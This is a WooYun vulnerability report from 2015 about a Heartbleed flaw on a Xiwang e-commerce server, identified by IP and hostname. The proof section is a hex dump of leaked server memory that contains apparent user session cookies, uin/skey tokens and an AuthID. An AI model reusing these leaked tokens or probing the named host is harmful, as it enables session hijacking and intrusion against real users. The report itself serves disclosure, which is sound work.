当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125189

漏洞标题:习网商城某站heartbleed

相关厂商:习网

漏洞作者: myhalo

提交时间:2015-07-07 17:31

修复时间:2015-07-12 22:54

公开时间:2015-07-12 22:54

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

duang~~~

详细说明:

121.14.117.55->http://szxsc.shop.6v68.com

2.png

漏洞证明:

Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 4C 61 6E 67 ....#.......Lang
00e0: 75 61 67 65 3A 20 7A 68 2D 63 6E 0D 0A 41 63 63 uage: zh-cn..Acc
00f0: 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A ept-Encoding: gz
0100: 69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73 65 ip, deflate..Use
0110: 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla
0120: 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (compatible
0130: 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 ; MSIE 6.0; Wind
0140: 6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 29 ows NT 5.1; SV1)
0150: 0D 0A 48 6F 73 74 3A 20 67 72 61 70 68 2E 63 69 ..Host: graph.ci
0160: 77 6F 6E 67 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 63 wong.com..Connec
0170: 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 tion: Keep-Alive
0180: 0D 0A 0D 0A 3D 3E 4E 37 CB 07 12 3D A3 BE E1 C2 ....=>N7...=....
0190: DB 15 71 1A 19 30 4E 6A 07 07 07 07 07 07 07 07 ..q..0Nj........
01a0: 20 43 4C 52 20 33 2E 30 2E 30 34 35 30 36 2E 33 CLR 3.0.04506.3
01b0: 30 3B 20 2E 4E 45 54 20 43 4C 52 20 33 2E 30 2E 0; .NET CLR 3.0.
01c0: 34 35 30 36 2E 32 31 35 32 3B 20 2E 4E 45 54 20 4506.2152; .NET
01d0: 43 4C 52 20 33 2E 35 2E 33 30 37 32 39 29 0D 0A CLR 3.5.30729)..
01e0: 48 6F 73 74 3A 20 67 72 61 70 68 2E 63 69 77 6F Host: graph.ciwo
01f0: 6E 67 2E 63 6F 6D 0D 0A 0D 0A 80 02 FE 39 96 AF ng.com.......9..
0200: 30 58 24 AC 82 FE B2 BA C9 B2 F6 CC 8D 4B 01 01 0X$..........K..
0210: D1 A5 7A E3 19 F3 DB 88 8C 08 05 05 05 05 05 05 ..z.............
0220: 31 2E 75 74 6D 63 73 72 3D 28 64 69 72 65 63 74 1.utmcsr=(direct
0230: 29 7C 75 74 6D 63 63 6E 3D 28 64 69 72 65 63 74 )|utmccn=(direct
0240: 29 7C 75 74 6D 63 6D 64 3D 28 6E 6F 6E 65 29 3B )|utmcmd=(none);
0250: 20 70 67 76 5F 70 76 69 3D 31 37 34 34 33 38 34 pgv_pvi=1744384
0260: 30 30 0D 0A 48 6F 73 74 3A 20 67 72 61 70 68 2E 00..Host: graph.
0270: 63 69 77 6F 6E 67 2E 63 6F 6D 0D 0A 43 6F 6E 6E ciwong.com..Conn
0280: 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali
0290: 76 65 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 ve..Accept-Langu
02a0: 61 67 65 3A 20 7A 68 2D 63 6E 0D 0A 0D 0A 4E 67 age: zh-cn....Ng
02b0: F7 0D 40 D2 A6 6A 9E 52 9F 15 6E 07 46 A7 99 D7 ..@..j.R..n.F...
02c0: 48 DF 05 05 05 05 05 05 61 46 6E 77 4E 61 44 30 H.......aFnwNaD0
02d0: 66 53 79 54 49 43 50 75 78 61 61 6A 37 43 4C 35 fSyTICPuxaaj7CL5
02e0: 6F 78 65 66 76 6F 52 55 31 2B 6A 39 68 38 62 51 oxefvoRU1+j9h8bQ
02f0: 3D 3D 3B 20 75 69 6E 3D 34 33 39 30 32 30 34 34 ==; uin=43902044
0300: 35 3B 20 73 6B 65 79 3D 40 38 61 64 64 38 38 31 5; skey=@8add881
0310: 37 65 33 0D 0A 0D 0A 35 80 FB 46 03 03 F2 D7 A3 7e3....5..F.....
0320: 39 DA 0C 5B 3E 70 97 00 21 B4 30 04 04 04 04 04 9..[>p..!.0.....
0330: 8F 3C 39 04 04 04 04 04 4E 34 30 46 31 55 42 36 .<9.....N40F1UB6
0340: 6B 74 2F 31 4B 4A 6D 46 4C 74 55 44 6B 39 76 4B kt/1KJmFLtUDk9vK
0350: 36 6D 44 4A 7A 50 34 56 68 49 6B 41 66 65 76 64 6mDJzP4VhIkAfevd
0360: 68 49 4A 2F 35 45 71 44 39 44 62 77 50 73 4A 65 hIJ/5EqD9DbwPsJe
0370: 2F 2F 77 33 2B 4E 79 7A 42 4C 44 73 72 39 35 34 //w3+NyzBLDsr954
0380: 61 43 78 6C 35 61 51 62 79 6E 33 37 31 64 6A 4C aCxl5aQbyn371djL
0390: 73 52 49 68 68 79 52 4F 6A 46 43 31 61 50 4A 6F sRIhhyROjFC1aPJo
03a0: 47 79 2B 75 54 42 6D 39 52 4F 71 57 6F 57 74 2B Gy+uTBm9ROqWoWt+
03b0: 6B 70 59 64 38 66 51 2F 62 72 66 6C 35 56 66 38 kpYd8fQ/brfl5Vf8
03c0: 4B 57 72 36 72 77 76 75 67 6A 49 43 52 4B 74 35 KWr6rwvugjICRKt5
03d0: 61 72 57 4A 36 31 7A 55 4B 46 6E 38 62 6B 74 32 arWJ61zUKFn8bkt2
03e0: 58 68 78 32 57 69 2F 6F 37 64 62 35 51 48 31 6F Xhx2Wi/o7db5QH1o
03f0: 55 64 33 76 6B 4D 41 4B 2F 37 47 48 36 4D 42 58 Ud3vkMAK/7GH6MBX
0400: 42 75 57 34 46 77 31 56 75 33 49 4C 30 76 75 76 BuW4Fw1Vu3IL0vuv
0410: 51 7A 4C 4F 41 69 4D 6D 71 52 5A 36 57 43 76 5A QzLOAiMmqRZ6WCvZ
0420: 62 30 69 54 54 76 55 6D 30 50 45 2B 6A 64 68 37 b0iTTvUm0PE+jdh7
0430: 2B 74 69 66 75 78 56 47 66 75 47 4E 41 51 63 31 +tifuxVGfuGNAQc1
0440: 2B 5A 78 73 32 38 71 6F 32 6E 32 53 62 36 72 41 +Zxs28qo2n2Sb6rA
0450: 54 66 35 57 48 48 67 4B 6B 68 53 56 6F 68 6C 42 Tf5WHHgKkhSVohlB
0460: 36 66 43 67 6A 6F 58 48 6E 44 69 4A 70 49 61 5A 6fCgjoXHnDiJpIaZ
0470: 2F 2F 31 77 33 48 68 4D 42 73 46 6B 6D 72 6E 61 //1w3HhMBsFkmrna
0480: 72 6D 69 71 35 31 2B 50 42 75 4B 43 71 30 71 36 rmiq51+PBuKCq0q6
0490: 65 6D 65 42 57 5A 6B 3B 20 41 75 74 68 49 44 3D emeBWZk; AuthID=
04a0: 64 75 46 78 7A 74 54 31 65 72 43 30 68 61 2F 58 duFxztT1erC0ha/X
04b0: 4B 4E 37 41 56 5A 52 37 2F 72 50 58 41 6E 48 52 KN7AVZR7/rPXAnHR
04c0: 71 6A 74 56 42 6C 6E 2F 39 63 36 62 73 35 2B 36 qjtVBln/9c6bs5+6
04d0: 66 47 4D 2F 73 7A 42 65 34 55 63 4B 6D 56 73 41 fGM/szBe4UcKmVsA
04e0: 46 69 47 45 53 74 70 41 42 6D 33 49 69 61 31 35 FiGEStpABm3Iia15
04f0: 34 38 76 4E 63 31 67 78 44 36 57 72 44 6F 5A 6D 48vNc1gxD6WrDoZm
0500: 73 55 39 6E 5A 78 48 76 48 35 5A 65 76 56 75 48 sU9nZxHvH5ZevVuH
0510: 51 72 43 59 43 4C 54 65 44 64 53 77 75 37 34 4B QrCYCLTeDdSwu74K
0520: 52 55 2F 6B 41 66 74 71 74 55 78 63 30 2B 6E 32 RU/kAftqtUxc0+n2
0530: 38 56 5A 36 77 79 57 77 33 58 64 77 57 6C 48 63 8VZ6wyWw3XdwWlHc
0540: 37 36 45 41 5A 6A 53 34 6D 49 63 4F 31 65 61 4A 76EAZjS4mIcO1eaJ
0550: 61 49 37 6C 36 56 77 43 2F 64 39 62 2B 70 70 4B aI7l6VwC/d9b+ppK
0560: 41 33 48 6D 49 6B 6F 33 69 79 4D 6D 4A 61 61 44 A3HmIko3iyMmJaaD
0570: 5A 50 4B 4B 6F 41 3D 3D 3B 20 75 69 6E 3D 34 38 ZPKKoA==; uin=48
0580: 30 37 36 35 37 33 38 3B 20 73 6B 65 79 3D 40 30 0765738; skey=@0
0590: 33 35 34 61 34 30 36 64 36 3B 20 43 4E 5A 5A 44 354a406d6; CNZZD
05a0: 41 54 41 31 35 32 33 31 32 35 3D 63 6E 7A 7A 5F ATA1523125=cnzz_
05b0: 65 69 64 25 33 44 31 32 32 35 30 35 38 34 35 30 eid%3D1225058450
05c0: 2D 31 34 33 36 32 34 35 32 37 39 2D 25 32 36 6E -1436245279-%26n
05d0: 74 69 6D 65 25 33 44 31 34 33 36 32 35 30 36 37 time%3D143625067
05e0: 39 3B 20 43 4E 5A 5A 44 41 54 41 31 32 35 33 34 9; CNZZDATA12534
05f0: 30 35 35 39 39 3D 32 38 34 39 38 36 35 38 37 2D 05599=284986587-
0600: 31 34 33 36 32 34 38 37 30 36 2D 25 37 43 31 34 1436248706-%7C14
0610: 33 36 32 34 38 37 30 36 0D 0A 41 63 63 65 70 74 36248706..Accept
0620: 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 0D -Encoding: gzip.
0630: 0A 58 2D 56 69 61 3A 20 31 2E 31 20 64 67 31 34 .X-Via: 1.1 dg14
0640: 31 3A 33 20 28 43 64 6E 20 43 61 63 68 65 20 53 1:3 (Cdn Cache S
0650: 65 72 76 65 72 20 56 32 2E 30 29 0D 0A 43 61 63 erver V2.0)..Cac
0660: 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D he-Control: max-
0670: 61 67 65 3D 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F age=0..Connectio
0680: 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 0D n: keep-alive...
0690: 0A 8A 57 4F 2C 6C 4D 53 2A 3D 48 11 4C 4D F0 3C ..WO,lMS*=H.LM.<
06a0: F7 3F 88 E0 78 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A .?..x...........
06b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

修复方案:

打补丁

版权声明:转载请注明来源 myhalo@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-12 22:54

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无